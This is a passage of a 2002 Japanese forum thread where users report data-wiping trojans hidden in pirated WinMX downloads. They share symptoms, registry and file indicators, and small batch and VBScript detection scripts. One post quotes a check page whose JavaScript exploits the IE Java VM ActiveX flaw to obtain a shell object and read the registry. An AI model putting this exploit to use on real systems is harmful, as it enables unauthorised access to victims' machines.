リカバリーディスクで、購入時の状態にもどしましたが、
痛い。

805 : :02/01/13 13:42
去年某[k]サイトのリンク先にあったFinalDataEnterpriseを
拾ったんだけど、これCD-ROM版らしいんだよね。
autorun.infとかautorun.exeとかあるんだけど。

これヤバイの?
総ファイル10,047,341バイト。
尻無いから単なるコレクションだが(w

806 :名無しさん@そうだ選挙に行こう:02/01/14 20:23
こんなスレがあったのか。
当方も被害に遭いました。

あ〜あ

年末にハードディスクを買い換えたところで
それ以前のデータは前のHDDに残したままだったので
まあ、被害は少ない方だと思いますが。

807 :名無しさん@そうだ選挙に行こう:02/01/14 22:03
ちなみにDriveImage2001 for CD-Rだったと思います。

808 :  :02/01/14 23:37
           

809 :名無しさん@お腹いっぱい。:02/01/15 08:03
>>788
VMWare3.0ユーザです。
サイトで評価版ダウンロードして正規にレジストしました。
インストールしてから2ヶ月以上経つけど問題なく動作中。

810 :名無しさん@お腹いっぱい。:02/01/15 21:00
先週末、海外のエロサイトを回っていたら、突然ハードディスクにアクセス
されてしまった。そしたらハードディスクの中身が急激なスピードで削除されて
いきました。とっさの判断でPCのリセットボタンを押し、そして再起動と
同時にリカバリーディスクでクリーンインストールしました。

同じような経験された方、他にもいますか?

811 : :02/01/15 21:02
>>810
JavaとActiveXの設定はどうなってる?

812 :810:02/01/15 21:06
>>811さん

JavaとActiveXって名前しか知りません。どのように設定すればよいのですか?
それでもって、ついでに私のハードディスクの中身が削除された原理を教えて
いただけませんか?

813 :名無しさん@お腹いっぱい。:02/01/15 21:14
Autoexec.camてなんですか?

814 :_:02/01/15 23:04
>>812
その様子だとデフォで閲覧してたのね・・・

815 :810:02/01/15 23:43
>>814さん

恥ずかしながらそうです。だから私の疑問について返答して
下さいませ。

816 :814じゃないけど:02/01/16 01:06
>>815
とりあえず ↓ここでチェックしてみては?
ttp://inetsvr3.nicnet.co.jp/test/chkVM.asp

817 : :02/01/16 01:14
<meta http-equiv="CONTENT-SCRIPT-TYPE" content="text/javascript">
</head>
<body>
<div align="right" class="update">2001/08/24</div>
<h1>VM 脆弱性 チェック for IE5.01</h1>
<p><font color="#a0a0a0" size="-1">Your Browser: Mozilla/4.0
(compatible; MSIE 5.01; Windows 98)</font></p>
<p>スクリプトの実行を許可していても、
このページでは
<strong>[安全]</strong>
というダイアログボックスが現れるはずです。
もしも <strong>[危険]</strong> というダイアログボックスが現れたら、
com.ms.activeX.ActiveX に対する VM の脆弱性があります。</p>
<div style="font-size:85%;">
※ VM に脆弱性があっても、 スクリプトの実行を許可していないなど、
ブラウザの設定が安全にしてあれば、 [安全] と表示されます。</div>
<script type="text/javascript">
<!--
var shl;
function attack() {
try{
a = document.applets[0];
a.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a.createInstance();
shl = a.GetObject();
alert("危険");
}
catch(e){
alert("安全");
}

try{

818 : :02/01/16 01:16
shl.RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\Tcpip\\Parameters\\Hostname");
if(0 < s.length){
alert("[危険] ホームページ側から、"
+ "自由にレジストリを読み書きしたり、"
+ "ファイルを削除したりすることができる状態です。");
if(confirm("[危険] 試しに、"
+ "レジストリからコンピュータ名を"
+ "読み出してみてよいですか?")){
alert("[危険] "
+ "レジストリからコンピュータ名を読み出してみました。\n"
+ "コンピュータ名は 「" + s + "」 ですね?\n\n"
+ "レジストリを読み書きできるということは、"
+ "コンピュータの設定を自由にあやつることができるということです。\n"
+ "非常に危険な状態です。");
}
}
}
catch(e){
}
}
setTimeout("attack()", 3000);
// -->
</script>
<applet width="1" height="300" code="com.ms.activeX.ActiveXComponent">
Applet: com.ms.activeX.ActiveXComponent<br>
(この文字が表示されているブラウザは、問題ありません。)
</applet>

<h2>[危険] と表示されたら . . .</h2>
<p>ただちに対策を行いましょう。 そのままにしておくと、Web ページを見ているあいだに
Windows を使用不能にされてしまう可能性があります。</p>
<dl>

819 :814じゃないけど:02/01/16 01:17
>>816 のリンク先のさらに幾つかリンクがあるから、
そこも読んで勉強してね。

820 :810:02/01/16 05:28
>>814じゃないけど さん

ご丁寧に書いて下さってどうも有り難うございます。それではそのサイトに行って
勉強することにします。

821 :名無しさん@お腹いっぱい。:02/01/19 14:22
>>810
とりあえずIEを使っているなら今すぐすること
IEのバージョンアップしてここで修正プログラムインストールね。
http://www.microsoft.com/japan/enable/products/security/
次にIEを立ち上げてブラウザの一番上の段のメニューバー
ツール>インターネットオプション>セキュリティタブ>で「高」にしてブラウンジングする。
「レベルのカスタマイズ」ボタンを押せばわかると思うけど
それであくちぶXとか無効になってるでしょ。

あとはセキュリティ高にしてると見れないサイトも出てくるけど
その度にいちいちインターネットオプションを出すのがウザイなら
タブブラウザが便利と思われ。
タブブラウザは色々好みが分かれるけどツールバーボタンからの
セキュリティの切り替えが一番秀逸だと思うのがこれ
http://pc.2ch.net/test/read.cgi/win/1011191549/l50
お気に入り・ブックマークの移行
http://www6.plala.or.jp/downward/MDI/help/html/first_import.html
とかヘルプもあるし色々試してみるとヨイ。
んでオミトロンhttp://pc.2ch.net/test/read.cgi/win/1010675673/l50
入れたりしたら。

822 :名無しさん@お腹いっぱい。:02/01/20 00:17
MXのfinaldata使ったら消されてしまった…。
ファイナルデータで復旧出来るかどうかわからないからMXでまた落として
来たけど(懲りない奴)どうなんかな…。
既出なら悪いけど、安全なファイナルデータとかわかります?
エンタープライズ版10572681バイトなんだけど。

直せるならちゃんとNTFS版パーソナル買ってくるから、直せるかどうかだけでも知りたい。
(お試し版ではファイルは出てくるんだけど…)

823 : :02/01/20 00:36
お前もカビキラーにカビ生えちゃったパターンか…(藁

824 :( ゚д゚)ポカーン:02/01/20 00:40
ナンダトゴルァヽ(`Д´)ノ

825 :名無しさん@お腹いっぱい。:02/01/20 00:44
って、よく見たら違う板だったのね…板違いスマソ
(他板から飛ばされて来た)

826 :名無しさん@お腹いっぱい。:02/01/20 00:46
>>822
だから復旧できないって。
過去ログくらいよめ!

827 :名無しさん@お腹いっぱい。:02/01/20 00:52
>>822
俺も同じのでやられたぞ。
オーバークロック試してたらドライブ見えなくなってしまったので、
MXでFainalDataのエンタープライズ落としてきて復旧作業してたら別ドライブのデータ見事に消されてしまった。
でもインストーラーにウイルスくっついてるだけのようなので
レジストリエントリ消して、windows\system32\winsvc.exe消してそのまま使ってる。
落として来たZIPは消しちゃったからサイズ分からんけど。
で、データサルベージの件だけど、俺の場合はファイル見えても全部33バイトになってて使えなかった。
1ヶ月前にバックアップ取ってあったから、被害はここ1ヶ月のお宝画像だけだったけどな。

828 :名無しさん:02/01/20 00:52
そのウイルスホスィー
なんて名前?


829 :名無しさん@お腹いっぱい。:02/01/20 00:54
>>828
http://www.google.com/search?q=winsvc.exe&hl=ja&lr=lang_ja

830 :名無しさん@お腹いっぱい。:02/01/20 00:55
>>825
板&スレ 誘導は悲しいかな確かに合ってるぞ!!

831 :名無しさん:02/01/20 00:57
winsvc。
MXで持ってる人居ない.....。


832 : :02/01/20 01:13
http://www.geocities.co.jp/SiliconValley-Bay/4070/yume.swf

833 :825:02/01/20 01:16
>>826
関連スレと過去ログ100まで読んだが…。
8年使ってきて初めて食らったウイルスがこんなまぬけなものだとは。
MXなんか久しぶりに起動したのに。ヽ(`Д´)ノクヤチイ!
バックアップなんかかけらもとってないからあっさりオールクリーンだよ。
移行にゃ丁度よいか…。

とりあえず、どうせもう消えちまった事だしウイルス付復旧ソフトで
見てみるとするわ。
>>830
一応MX関連は板違いクサイんで
>>831
600メガのエロ動画となら交換しちゃろか?(笑

834 :202.221.45.130:02/01/20 01:23
202.221.45.130

俺のIPアドレスだ、おめーらの技量じゃハックデきね〜だろうけどw

835 :名無しさん:02/01/20 01:29
(゚д゚)ウマー 持ってねーか?

836 :822:02/01/20 07:15
つーか、落ち着いて過去ログ読んだら症状そのものじゃん(;´Д`)
冷静になれず糞レスしてしまって申し訳ない。
今頃かかるなんて(゚д゚)アホクサー

でも壊れたファイルをフォーマットする意気地がないんだけど…。
落としたエンタープライズ版は98/Me用だから使えねーし諦めがつかん…。


しかしまあ、今までウイルスに食らった事なかったし、バックアップもTOWNS時代に
フロッピーでセコセコやったっきりで数年しなかったんで、これを教訓にするか…。

ウイルスと無縁と思ってる奴が泣きを見るって煽り半分で上に書いてるけど
まさにその通りですな(泣)


良スレageヽ(`Д´)ノ

837 :名無しさん@お腹いっぱい。:02/01/20 10:24
正直言ってファイナルデータって復旧出来なくない?
例え取り出せても、アプリのexeが起動しないし。

838 :名無しさんに接続中…:02/01/20 11:23
そろそろこのスレも使い切ってしまいそです。
どなたか今までのまとめを発表してもらえないでしょうか?
原因・結果・対策・

839 :名無しさん@お腹いっぱい。:02/01/20 13:10
結論:MXには手を出すな。

840 :名無しさん@お腹いっぱい。:02/01/20 15:34
>>837
このウイルスは、複雑な消し方をしているから復旧できないだけ。
普通に消したり、フォーマットしただけならば復活できる。

841 :名無しさん@お腹いっぱい。:02/01/20 18:47
わしもやられるまで「こんなん引っかかったらオワリだな」と
みんなで言っていた翌日やられた
気を抜いてPCやってはいかんと思ったよ

842 :名無しさん@お腹いっぱい。:02/01/20 19:07
ACCSが流してんじゃねーかと勘ぐってみたり

843 :志村けん:02/01/20 19:37

おまえ〜、それはないだろう〜 (流行ってるギャグ)

844 :名無しさん@お腹いっぱい。:02/01/20 19:54
そんなこたぁ ないでしょう。(某ゲームメーカーN社から某MS社に移った広報:Hさんの言葉)

845 :名無しさん@お腹いっぱい。:02/01/21 11:10
仲間がいるのか?
俺は今朝午前3時に
HDD50GB全部逝ったよ。

再起動した直後じゃないのに、
いきなり発動して。

846 :845:02/01/21 11:11
オンラインウイルススキャンもすべて引っかからず。
もちろんFINALDATAも役立たず。

847 :名無しさん@お腹いっぱい。:02/01/21 12:47


848 :名無しさん@お腹いっぱい。:02/01/21 18:06


849 : :02/01/21 18:27
211.56.136.183  
こいつが毎日ウィルスを送ってくる・・・。

850 :名無しさん@お腹いっぱい。:02/01/21 19:26
>>849
http://www.soft4ever.com/security_test/En/index.htm
からyalta.zipを落とす。適当なフォルダへ解凍後 yalta.exe を起動、

Target IP Address:そいつのIPアドレス
text to send:ウイルス送ってくんなヴォケ!(←韓国語で)

これを各portへ向けて Leak Testで送ってみよう!
ひょっとしたら読んでくれるかもしれないよ。


851 :名無しさんに接続中…:02/01/21 21:16
>>845
もっと詳しく情報きぼんぬ

852 :名無しさんに接続中…:02/01/21 21:17
>>849
ウイルスを送ってるってどうして分かるのでしょうか?
教えてチャソでスマソ。

853 :名無しさん@お腹いっぱい。:02/01/22 00:49
>>851

いきなりWordXPに何かエラーが出だして、
再起動したらHDDがフォルダだけ残して
からっぽに。
FINALDATAでのぞいてもすべてのデータが33バイトに。

ただ、この症状のウイルスに亜種が多いみたいで
どれかは今だ分からず。

とりあえず、ウイルススキャンでは発見できず、
何回も再起動してても何の症状も現れず、
いきなり発症した。

854 : :02/01/22 02:09
「落としてはいけない物リスト」作者です

こちらでもmx関連の話題が多いようなので、念のため貼っておきます。参考にしてください。
(このスレ+Download板のトロイスレ1〜3の情報をコピペしてあります)

 http://www.clickjump.net/mx
 http://mxtrojan.tripod.com/
 http://www.geocities.com/mxtrojan/

(私はすでにmxからは引退した身なので、次回更新は未定です)
中にはネタ情報が含まれているかもしれませんが、、HDD全消去には気を付けましょうです・・

855 :経験者:02/01/22 03:01
>>854
にいろいろあげてくれているようなんだけど
当方、「DriveImage for CD-R」でやられたんで
追加しておいてほしいな、と思った今日この頃。

856 :名無しさん@お腹いっぱい。:02/01/22 03:07
>>855
俺も昨日HDDがふっとんだところなんだけど、
ウイルススキャンにはかからなかったよね?

857 :経験者:02/01/22 03:15
いやあ

警戒なんかしてなかったんで
そのままインストール→HDD消去ですよ。兄貴

858 :856:02/01/22 04:05
>>857

まあウイルススキャンにはどうせひっかからないらしいから
一緒だけどね(w

俺は時限式で急にドカン!!(w
再起動してすぐに発動ならアプリ特定出来たんだけど・・・

859 :名無しさん@お腹いっぱい。:02/01/22 08:07
WAREZに仕込まれてるトロイやウイルスじゃ発見駆除ツール業者に報告するわけにも行かないから対応はなしか?

860 :名無しさん@お腹いっぱい。:02/01/22 08:37
>>859
案外、これらのウイルスはソフトメーカーが仕込んでいたりしてね。

861 :名無しさん@お腹いっぱい。:02/01/22 11:28
そして伝説へ・・・

862 :名無しさんに接続中…:02/01/22 17:46
スタートアップで確認できるんじゃなかったの???

863 :856:02/01/22 18:03
>>862

OSを終了するごとに毎回確認するなら大丈夫な気がする・・
アプリのインストール後だけなら時限式には対応できないような。

864 :名無しさソ:02/01/22 21:43
そのウイルス持ってねーか?

865 :_:02/01/22 21:47
時限式・・・・コワ

866 : :02/01/23 03:36
「W32.Whiter.Trojan」 症状と対策
症状:OS起動後(ログオン後)、HDDに激しくアクセス。デスクトップのアイコンが
消えたり、使用中のソフトにアクセスできないというエラーが出る。フォルダのみ
を残して全ファイルが削除されている。ネットワークドライブに割り当てられている、
LAN上のドライブも同じように削除される。OSを終了すると二度と起動しない。
修復ソフトなどでファイルを復活させるとすべて33バイトになっており、
事実上復活不可能。


原因: Whiterウイルス=インストーラー等に仕込まれており、知らずに実行すると
感染する。このウイルスが -next のコマンドライン引数で実行されると、
ファイルサイズを0バイトにしたあと削除するため、フォルダのみを残し全ファイルが削除される。
Adobe製品やLightwave、エロゲなど、感染源多数。


対策:インストールした後(必ずOSを終了する前)、レジストリの以下のキーを調べる。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここに
Whistler %System%\whismng.exe -next
という記述があればすでに感染している。すぐにそのキーを削除すればよい。
別の方法としては、システムフォルダ内にwhismng.exeがないか調べる。
あれば削除、もしくは別の場所に移動する。ただし名前を変えられると
この方法は使えない。OSを再起動してからでは手遅れになるので注意。
また、ノートン先生はこのウイルスを検出できるらしい(未確認)。
参考ページ http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html

867 : :02/01/23 03:45
コリャコエー

868 :765:02/01/23 03:56
何がどうあれ、コレでOKやろ。
http://www.puchiwara.com/hacking/
なぁ、諸君。

869 ::02/01/23 06:26
とりあえず厨房サイトの宣伝やめてくれ。

870 : :02/01/23 22:34
>>853
そのXPが拾い物だったっていうオチじゃないだろな(;´Д`)

871 :856:02/01/23 23:44
>>870

ハハハ。
そのWordは売ってるやつなので大丈夫。

872 :sage:02/01/25 01:09
ガイシュツだったらすまん。
「レジストリとスタートアップを確認して電源を切る」専用プログラムを用意。
で、電源切るときにはその専用プログラムを使って切るようにすれば
問題ないんじゃないの?
(もちろん新種・亜種には対応しにくいが)
ダメな理由があるんなら教えてくれ。
そういうプログラムを作ってみたい。


873 :名無しさん@お腹いっぱい。:02/01/25 01:13
要するにインストーラが必要ないものには関係無いって理解でいい?

874 :名無しさんに接続中…:02/01/25 10:25
>>872
>そういうプログラムを作ってみたい。

カコイイ!!

875 :872:02/01/25 16:27
>>874
2ch初発言でこんな嬉しいコメントもらえると思わなかった。
ありがとう。

アイディアだけでプログラム自体は簡単なはず。
ここを見ている方の中で。VBscript使える人いない?
(その前にVBscriptで電源offって可能なのか?)
このウイルス限定ならおそらく20行もあれば書けない?
ここに張り付ければみんな使える

レジストリではなくファイルで検索として

c:\windows\system\whismng.exeファイルが
有り→W32.Whiter.Trojan 疑惑の為電源off中止
無し→電源off

だけだよね?

欲しがっている人がいるんなら
vbsちょっと勉強すっかなぁ

※コピーユーザの方を守るために作りたい訳ではない。
(一応ソフト作って食べている者だから。mxも使ってないし)
ただ「全部消す」ってやり方が私にはど〜しても気に入らない


876 :名無しさん@お腹いっぱい。:02/01/25 18:36
うぁ・・・漏れもやられたYo・・・鬱だ氏のう・・・
メールで来たっぽい・・・ノーd先生何も教えてくれなかった(;´Д`)
125GB全部パーに。バクアプ取ってなかった。。。
FinalDataも使えん。エンタープライズ版ならできるのかなぁ・・・
しばらく、立ち直れない・・・

877 : :02/01/26 01:23
>>876
詳しい情報キ・ボンヌ。

878 :*には***ーないねーん:02/01/26 03:04
ここでHD消しちゃった人見てると微笑ましいよ
俺なんて故意に感染させたとき以外は一度もウイルス、トロイにかかったことないよ
メール添付型ですらね。

何のソフトだったか忘れたけど、いかにも怪しいファイルがあって、
付属の説明文もあやしい解説不足なやつだった。
感染しないだろうとか感染しても被害なんて無いよなんて思いながら起動したら
インストーラーみたいなのを吐き出して、
何だろうと思ってインストさせたら十個近いファイルをインストしたらしい動作。
フリーズしたので何の疑いもなくいつもの再起動
。。。と思ったらデスクトップからありとあらゆるアイコンが消滅(藁
再起動させれば直るかと思って再起動させるとあらゆる動作を許さないように
起動時にツールバーやエクスプローラー(システム内部の方のやつ)を
一切起動できないようにしてあった。
おかげで起動後はデスクトップとポインタだけだった。

結局とある方法でそれらの原因となるファイルを消して何事も無かったかの様に今に至る。
損害ゼロ。あると言えばどうしようか考えた時間くらい。

楽しい一日でした

879 :名無しさん@お腹いっぱい。:02/01/26 03:27
>>876
もっと詳しい情報書いてください。
MXとか割れ物はやっていませんか?
それなのに消えたんですか?

>>878
コピペ?

880 :名無しさん@お腹いっぱい。:02/01/26 04:51
俺もやられたよ……60GBが全滅……鬱だ……。
MXだよ、MX。確かここ数日はいくつかの小ファイルを落としてたから
それらだと思うけど。FINAL DATA使っても復活できたのは殆ど無か
った……。

ただ、CD革命に入れてたFCDだけは無事だった。まだ試してないけ
どちゃんと使えるっぽい。なんでだろ? CDと認識されて消されんか
ったんかな。

881 :名無しさん@お腹いっぱい。:02/01/26 05:16
結構、やられている人多いんだね。
俺もやられた。

インストールしようとしたアプリは、特打英単語470点。
インストーラを起動すると、HDDが激しく動き出して全てのデータが消去!!
ちなみに、AVG AntiVirusには引っかからなかった。
初めて感染したので、ショックと衝撃で笑うしかできなかったよ。

今、再セットアップが終わったところ…。
いい教訓になった。


882 :名無しさん@お腹いっぱい。:02/01/26 05:16
>>877
ドライブにマウント中のFCDファイルは消せない
マウントしてから手動削除を試してみればいい

883 :名無しさん@お腹いっぱい。:02/01/26 05:19
MX落としたEXEファイルなんて怖くて実行できません。(一度やられてるし)
動画とか、画像とか、音楽とか、そういうのにとどめておいたほうがいいよ。
ソフトは買うのが一番安心。

884 :名無しさん@お腹いっぱい。:02/01/26 07:27
ゲームデータで騒ぐ奴がわからねえ

885 :初心者 ◆Monar7Wg :02/01/26 07:50
&age

886 :名無しさん@お腹いっぱい。:02/01/26 08:15
>>884
ゲームデータって何?そんな言葉無いぞ。

887 :名無しさん@お腹いっぱい。:02/01/26 09:58
>>875
意外とこういうレスから有能なプログラマが生まれたりするらしい
ガムバレ

888 : :02/01/26 14:16
>>883
動画もやばいらしいよ。

889 :名無しさん@お腹いっぱい。:02/01/26 14:34
>>872
漏れも WSH 多少使っているので作ってみるよ。


890 :名無しさん@お腹いっぱい。:02/01/26 14:38
>>888
飯島愛のあの噂でしょ?
あれはasfの拡張子がmpgと書き換えられていて、
メディアプレイヤーのホールを利用したやり方だね。
でも今はそのホールは無いし、そもそも動画をメディアプレイヤーでは
再生しない。

891 : :02/01/26 15:36
>>890
>そもそも動画をメディアプレイヤーでは
>再生しない。

何で再生してんの?



892 :名無しさん@お腹いっぱい。:02/01/26 15:55
>>891
プレイヤーなんていろいろあるじゃん。
メディアプレイヤーなんて重くて使う気にならん。

俺はKBMプレイヤー。

893 :872 ◆UqyWY3GQ :02/01/26 16:07
条件付き電源off終了プログラム
(c:\windows\system\whismng.exeがあれば電源offしない)
chkoff.batというファイルを(メモ帳などで)新規作成し
以下をコピーして下さい

@echo off
if exist c:\windows\system\whismng.exe goto ng
goto ok
:ng
echo ウイルスかも?電源offは中止した
goto bend
:ok
RUNDLL32.EXE Shell32.dll,SHExitWindowsEx 1
:bend


894 :872 ◆UqyWY3GQ :02/01/26 16:20
使い方はchkoff.batを起動するだけ。
見て分かるかも知れませんが
if exist c:\windows\system\whismng.exe goto ng
で c:\windows\system\whismng.exe があれば電源offしないだけ
(当たり前ですが他のウイルスには無防備です)

後はvbs使える人に任せる
(だって。BATなんてカコワルすぎる。これをプログラムと言っていいのかぁ?)

多分、w95,w98,meでは動作し nt,2000,xpでは動作しないと思う。

で、他にウイルスが増えた場合は追加すればokです。
例えば「極悪ウイルス。c:\windows\gokuaku.dllがあれば感染」
なんて情報があれば

if exist c:\windows\system\whismng.exe goto ng
if exist c:\windows\gokuaku.dll goto ng
goto ok

という行を追加すればok.

…神は無理か…民くらいにはなれただろうか…

887>>
ありがとう。時間無いからこれくらいで勘弁して。
dosはそこそこぷろぐらまの自信あるが
Windowsはダメダメぷろぐらまの自信があって
これくらいしかすぐには作れない

889>>
ぜひこのbatをwsh版にしてください
whismngが無ければ電源offの目的は達成しているけど
いきなりdosプロンプトが出たりしてカコワルスギル
お願いします


895 :名無しさん@お腹いっぱい。:02/01/26 17:43
>>866
ありがとうございました!!
ついさっきウイルスにかかって途方にくれていたところだったのです!!!

教えてくれたやり方で無理無くファイルを削除して
再起動かけて何とか生還しました!
本当にありがとうございました!!!

896 :名無しさん@お腹いっぱい。:02/01/26 18:03
>>895
再起動する前に、気がついたの?
なぜ?

897 :名無しさんに接続中…:02/01/26 18:08
ウイルス入りのソフト共有してる人は、ウイルス入りだってことに気づいてるの?
っていうか、このウイルスは他のファイルに感染しないんだよね?
だとしたら、わざとウイルス入れて共有してる???


898 :名無しさん@お腹いっぱい。:02/01/26 18:15
c:\windows\system\whismng.exeというディレクトリ作ってそん中に適当なファイル2,3個ほっぽりこんどきゃ防げるだろ。


899 :名無しさん@お腹いっぱい。:02/01/26 18:23
>>897
集めてるだけで起動しないコレクターも居るんじゃない。
あと交換用のネタとして持ってるとか。

900 :895:02/01/26 18:38
>>896
何かよくわからないとこに行っちゃって
なにかよくわからないものインストールしちゃって

再起動しますかって聞かれたから、なにか怪しいウイルスか!!
と思ってスキャンかけてもなにもでなくて
でもなんかやな感じだったのでここをウロウロしてたら

>>866
の記事を読んで検索して調べたら案の定ウイルスでした。
あとは記事のとうりにして
再起動かけました。

もうかなり怖いのでなにか対策ソフトを買うことにします。


901 :墓守:02/01/26 20:17
>>898
誰かの良レスが埋もれてる・・・・・・・

ファイル名が同じファイルは上書きできるけど、新規のファイル名と同じ名前のフォルダが存在するディレクトリには、新しくファイルを作成できないんですよね。

902 : :02/01/26 20:32
VBScript で書いてみた。
テキストエディタにコピーして拡張子を vbs にして保存。
ダブルクリックで実行できます。
レジストリキーの
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
を調べます。再起動する前に実行すれば気休めにはなるかも。
----------------------
On Error Resume Next
Dim Troj, i, ret, flag
flag = False

Troj = Array("Whistler", "WinSvc", "Krn132")

Set WshSHell = WScript.CreateObject("WScript.Shell")

key = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

For Each i in Troj
ret = WshShell.RegRead(key & i)
If ret <> "" Then
WScript.Echo i & " に感染中"
flag = True
End If
ret = ""
Next

If Flag = Flase Then
WScript.Echo "たぶん感染してません"
End If


903 :898:02/01/26 20:47
>>901
2,3個(1個でも構わんが)ほっぽり込んどくのはunlinkされたときの用心。


904 :墓守:02/01/26 20:54
>>903
同様にうちも、怪しい名前のフォルダがたくさんあります。

905 : :02/01/26 22:25
>>893 >>902
ご苦労様です。自分の様にスキルのない人間のためにありがとうございます。
俺も少しは勉強せねば・・・

906 :名無しさん@お腹いっぱい。:02/01/26 22:30
>>902
どうせなら、起動時に自動実行するものを保存、落とす時に比較した方が良かねーか?


907 :名無しさん@お腹いっぱい。:02/01/26 22:51
>898
感心したよ。賢いね。
後は皆で亜種のファイル名の報告をしよう。

908 :902:02/01/26 23:13
>>906
最初はそうしようと思ったんだけど VBScript はレジストリの
キーの下にある値の一覧を取得することができないんです。
だから既知の trojan の使う値を決めうちして調べてるんです。
中途半端でスマソ

909 :名無しさん@お腹いっぱい。:02/01/26 23:32
>>908
あぁ本当だ。なんて中途半端なオブジェクトなんだ >WshShell


910 :名無しさん@お腹いっぱい。:02/01/27 13:14
>>902
NAVが危険だと警告してます

911 :名無しさん@お腹いっぱい。:02/01/27 13:43
2000の場合は、
c:\winnt\system32\whismng.exe

でいいのかな?

912 :新種発見:02/01/27 15:17
昨日MXでダウンロードしたVirtualPC4.2に同種のワームを発見したよ。
ダウンロードした時にやたらと
そいつは「ソフトウェアない?」とか「ゲームない?」とか聞いてきやがったよ。
ひょっとしてどっかの組織の回し者か?

--------------------------------------
解除方法はコレネ
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここに
Piracy c:\WINNT\System32\winsvc.exe -n
がある。これを削除

913 :新種発見:02/01/27 15:30
(追加情報)
ファイル名:Connectix Virtual PC 4.2 日本語版.zip
サイズ:14,496,062


914 :名無しさん@お腹いっぱい。:02/01/27 17:26
>>912
違法ソフトを抹消するためにACCSが流しているのだろうか。
こんな事が続くと誰しも本物を買わざるを得ないと思う。


915 :名無しさん@お腹いっぱい。:02/01/27 17:39
>>912
単に交換したかっただけと違うの?

916 :名無しさん@お腹いっぱい。:02/01/27 19:19
>>914
そのために人柱が居るのだろう。

917 :名無しさん@お腹いっぱい。:02/01/27 19:44
まぁ一台テスト用マシンを用意すればいいだけなんだけどね。

918 :名無しさん@お腹いっぱい。:02/01/27 19:46
早速winsvc.exeというフォルダを作らなきゃね。

919 :名無しさん@お腹いっぱい。:02/01/27 20:12
>>917
数ヵ月後に発病とかだったらどーすんの?


920 :名無しさん@お腹いっぱい。:02/01/27 20:58
ttp://members.fortunecity.com/tqkudo/mose.html

これはどうなの?

921 :名無しさん@お腹いっぱい。:02/01/27 20:58
義兵

922 :名無しさん@お腹いっぱい。:02/01/27 22:08
ここに書き込んでも話が違うのかもしれないですが、つい先日、IE5.5からIE6にしようと思い、
DL完了してインストール終わって、再起動メッセージ出て再起動かけたらデスクトップの
アイコンやツールバースタートボタンなど全部無くて、ポインタと壁紙だけ・・・
唖然としてセーフモードで立ち上げたりしたのですが同じ。
詳しくないのでメーカーのサポートに電話していろいろサポートしてもらいましたが
無理で結局はリカバリして終わったのです。
サポートの人も困り果ててました。
ここに書き込みしてあるのと私の現象とは違いますよね???
私はマイクロソフトでDLしてましたから・・・
どーして起こったのか不思議でたまりません。


923 :名無しさん@お腹いっぱい。:02/01/27 22:16
もしかして割れOS(尻)?って聞いてみるテスト

924 :名無しさん@お腹いっぱい。:02/01/27 22:17
>>922
「インタネット」が付かないエクスプローラ.exeも逝っちゃったのかな???

925 :鬼畜:02/01/27 23:00
InstallSheild6手に入れたから仕込んでやる。ヒヒヒ。


926 :名無しさん@お腹いっぱい。:02/01/27 23:16
>>925
あっ、そのIS6仕込んどいたから。(藁

927 :鬼畜:02/01/27 23:18
 ((((((((((;゚Д゚))))))))ガクガクブルブル

928 :馬鹿:02/01/28 00:10
感染しました。

感染元はきっとAcrobat5
2ヶ月くらい前におとしてずっと使ってなかったのに何日か前にインストールした。

Win2000なのであんまり起動しないのですが1週間ぶりくらいに再起動したら
なんかOSがハングした。
おかしいと思って再起動したら「NTDIRがみつからん」とでて再起動不能。
Win2Kを再セットアップしたらフォルダを残してぜーんぶ消えてました・・・ハハ

ノーd先生も無反応でしたね。もっと早くこのスレ見つけてたらな・・・
復旧するのもめんどうなのであきらめることにします。

唯一の後悔はなんでAcrobat4の正規版もってるのにわれAcrobat5を
インストールしたのかと言うことですね。
もうAdobeソフトは出所がはっきりしてるやつしか使いません。

長レス失礼。

929 :912:02/01/28 00:10
>>915
>単に交換したかっただけと違うの?
その可能性も大いに考えられる。でもその時はなんとなく彼の言動に不信感を
感じてしまったのは確か。MXを始めてからはじめて何かピンとくるような感じに
なった。まぁ、考えすぎなのかもしれないが。
それよりIPをメモっとけば良かったと思っているよ。それをここで公開して
他の人も同様に公開していけば、たぶんACCS臭いドメインが絞られるのではないかと
思うしね。

>>920ブラクラ
お勤めご苦労様。


930 :割れたことは無いぞ:02/01/28 00:43
いや、マジなんだけどさ、怪しげなインストーラ付き割れを
サイバーポリスなり何なりの機関に立ち会ってもらって
実際にデータ吹っ飛ばしてくれるかどうか実験して、
案の定データ飛んだら刑事告発するのってどうよ?

もし、仕込んでるのがソフトメーカーだって判明したら
それってえらくおもろいやん。

931 : :02/01/28 01:23
ノートンに引っかからない理由を知っている人、教えて。
winsvc.exe 自体をノートンでスキャンしても引っかからないんだよな。
ウィルスパターンを最新に更新しても検知しないし。

シマンテックが意図的にこの種のワームを無視しているのか?
ノートンが糞なだけか?

932 : 1000!!!!!:02/01/28 02:45
  

933 : 1000!!!!!取り合戦開始!:02/01/28 02:45
   

934 :名無しさん@お腹いっぱい。:02/01/28 03:29
  今だ!おにぎりうしゲットォォォォォォ!!

    ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄
      /■\___            (´´
    ⊂ ・ ・ P ■ ■\〜*     (´⌒(´
   ⊂ ( Д⊂ ■ ■ つつ≡≡≡(´⌒;;;≡≡≡
ンモーーーーーーーーーーーーーッッッ  (´⌒(´⌒;;


935 :名無しさん@お腹いっぱい。:02/01/28 03:30
今だ!!フサギコウシゲットオォォォォォォォォォォ!!!!
    
   ̄ ̄ ̄ ̄ ̄V ̄ ̄ ̄ ̄ ̄
      A,,A ,,,,,,,,,,,,,,,,,,            (´´
    ⊂,,゚ ゚,,P ■,, ,,,■彡〜*     (´⌒(´
   ⊂,( Д⊂,,,,,■,,,,,,■,,,つ,つ≡≡≡(´⌒;;;≡≡≡
ンモーーーーーーーーーーーーーッッッ  (´⌒(´⌒;;


936 :名無しさん@お腹いっぱい。:02/01/28 03:30
今だ!!なっちうし背中ゲットだべ
        
    ̄ ̄ ̄ ̄V ̄ ̄ ̄ ̄          (´´
